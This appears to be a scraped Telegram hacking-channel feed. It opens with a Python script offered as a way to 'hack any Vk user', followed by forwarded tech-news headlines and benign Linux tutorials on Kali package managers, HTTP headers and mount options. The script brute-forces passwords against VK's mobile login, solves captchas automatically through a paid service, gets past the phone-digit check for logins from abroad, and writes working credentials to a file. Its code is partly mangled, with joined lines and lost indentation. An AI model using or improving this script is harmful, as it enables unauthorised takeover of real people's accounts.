UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
"Smart" brute force hack any Vk user ! partβ€”-2

#! coding: utf8
import grab, re, urllib2from antigate import AntiGatefrom grab import GrabTimeoutErrorfrom time import sleep
cap_key = '123 '
def anti(key, file): Captcha с Antigate
try:
try: data = AntiGate(key, file)
return data
except KeyboardInterrupt:
print("name")
except:
anti(key, file)
def save(url, file): #L
site = urllib2.urlopen(url)
f = open(file, 'wb')
f.write(site.read())
def cap_solve(img):
save(img, 'captcha.jpg')
key = anti(cap_key, 'captcha.jpg')
return keydef brute(login, passwords, save):
out = open(save, 'w')
psswrds = open(passwords,'r')

try:
int(login)
prefix = True
except:
prefix = False

g = grab.Grab()
g.go('http://m.vk.com')
for line in psswrds:
psswrd = line.rstrip('\r\n')
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.submit()
if g.doc.text_search(u'captcha'):
all_captchas = re.findall('"(/captcha.php[^"]*)"', g.response.body)[0]
captcha = '' + all_captchas
key = cap_solve(captcha)
g.doc.set_input('email', login)
g.doc.set_input('pass', psswrd)
g.doc.set_input('captcha_key', str(key))
g.doc.submit()
print("cap")
if 'ΠŸΠΎΠ΄Ρ‚Π²Π΅Ρ€Π΄ΠΈΡ‚ΡŒ' in g.response.body:
if prefix:
prefix1 = g.doc.rex_search('\+[0-9]*').group(0)
prefix2 = g.doc.rex_search(' [0-9]*').group(0)
pre1 = re.findall('[0-9]{1,}', prefix1)[0]
pre2 = re.findall('[0-9]{1,}', prefix2)[0]

login = login.replace(pre1, '')
login = login.replace(pre2, '')

g.set_input('code', login)
g.submit()
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
else:
out.write(login + ':' + psswrd + '\n')
else:
if g.doc.rex_search('[^>]+').group(0) == 'Login | VK':
print(login + ':' + psswrd + '--fail')
else:
print(login + ':' + psswrd + '--success')
out.write(login + ':' + psswrd + '\n')
out.close()
psswrds.close()


Naturally, the example is not optimized. You can also add proxies, multithreading and other goodies, but you will do it yourself if it is interesting. But the script is able to enter the missing digits in VKontakte protection itself when entering from another country, and also, using Antigate, easily enters Captch'i that appear after 5-6 attempts to enter from one IP.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Group chat: fear of cyberbullying erupts.
#CyberAttacks
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ‰ GUI software installers in Kali Linux:

1) Open a terminal and enter the following commands to install the Software Center in Kali.

$ sudo apt update
$ sudo apt install gnome-software

2) After the installation is complete, you will need to use vi or your favorite text editor to edit the /etc/apt/sources.list file for the application to work .

3) Add the following lines to the file.
$ sudo vi /etc/apt/sources.list

deb http://kali.download/kali/ kali-rolling main non-free contrib
deb http://ftp.debian.org/debian stable main contrib non-free
deb http://http.kali.org/kali kali-rolling main non-free contrib
deb http://http.kali.org/kali kali-last-snapshot main non-free contrib
deb http://http.kali.org/kali kali-experimental main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

4) To open the Application Center, run the gnome-software command from a terminal.

Installing Synaptic

5) Open a terminal and enter the following commands to install Synaptic in Kali.

$ sudo apt update
$ sudo apt install synaptic

6) After the installation is complete, use a search similar to the Application Center or run:

$ synaptic

7) Now you can search for and install new applications or remove existing ones from your system.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
iCloud windows application should be updated now ! new critical vulnerability has been patched.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
DVB-T2: goodbye Mediaset and Rai on TV if you don't change immediately.
#Technologies
Forwarded from UNDERCODE NEWS
Kaspersky has built a framework through the Internet for state elections.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to view HTTP headers in any website :

How to see HTTP headers in a web browser
1) This is the easiest method available on any operating system.

Press F12 in your web browser and open the page of interest.
2) Go to the Network tab and select the connection you are interested in.

Google Chrome / Chromium:

3) The Response Headers come first , and then the Request Headers , although of course the request and its headers are sent first, and then the response comes.

4) This is a convenient method, and you do not need to worry about the HTTPS protocol - since the web browser is the final destination, it can show the already decrypted data.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Warning! Google Play Store: here are the new dangerous apps for the smartphone.
#Malwares
Forwarded from UNDERCODE NEWS
Fujitsu disposes of 5 officers due to TSE system failure, President Tokita reduces monthly remuneration 50% for 4 months.
#international
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘lINUX parameters :

dev

Interpret special character or block devices in the file system.

nodev

Do not interpret special character or block devices on the file system.

diratime

Update the inode access time of a directory on this filesystem. This is the default. (This parameter is ignored if noatime is set .)

nodiratime

Do not update directory inode access times on this filesystem. (This parameter is implied if noatime is set .)

dirsync

All directory updates on the file system must be synchronous. This affects the following system calls: creat, link, unlink, symlink, mkdir, rmdir, mknod, and rename.

exec

Allow executing binaries.

noexec

Do not allow direct execution of any binaries on the mounted filesystem.

group

Allow a regular user to mount the file system if one of the user's groups matches the device group. This parameter implies the nosuid and nodev parameters (unless overridden by subsequent parameters in the group, dev, suid option line ).

iversion

Each time the inode changes, the i_version field will increment.

noiversion

Don't increment the i_version inode field.

mand

Allow mandatory locking on this file system. See fcntl .

nomand

Do not allow forced locks on this file system.

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
New way to earn money. Revenue increases with views, Voicy is a new way to monetize distributors starting next year
#Updates
Forwarded from UNDERCODE NEWS
Apple Watch: a battery strap patented by the giant.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Basics of mounting and using the mount command

A) What is mount
Mounting in Linux allows you to access the contents of the disk and organize the structure of the file system. Using mount, you can also open a disk image (for example, created with the dd program ) for operation , as well as open a variety of file systems and disk images (for example, virtual machine disk images) for access and editing; even remote network directories can be mounted, making them available as if they were files on any other local storage.

In addition to the fact that you can work with disk images using mount, correct mount settings are necessary for the computer to which the disk for forensic analysis is connected - for example, this disk should not be automatically mounted with write rights (so as not to be corrupted).

Linux has such a thing as β€œmounting” a disk. To access the files on this drive, you must first mount it. The question may arise, why such difficulties? Mounting is one of the most powerful things that lets you customize your filesystem with amazing flexibility!

The essence of mounting is that a new directory (regular folder) is created in the file system, for example, this is the / mnt / disk_d folder . And then the mount command indicates that now, for example, the / dev / sda disk is mounted in the / mnt / disk_d directory . After that, you can access the files on the / dev / sda disk by opening the / mnt / disk_d folder in any file manager

B) With the help of this approach - when any disk can be any folder in the system, you can make a very flexible setting. The most common example encountered in practice: user files are stored in the / home / username / folder , for example, I have this folder / home / mial / . When installing the operating system, I can make it so that my second or third disk (and not the system one) will be mounted at / home / mial / . That is, the entire operating system will be located on one disk, and all my user files on the other. What does it do? In case of reinstalling the system, I will re-configure mounting the disk with my files to the / home / mial / folder and as a result, in the new, just installed system, all my documents, photos and so on will already be in place!


▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Apple is working on its foldable iPhone: it could arrive in 2022.
#Technologies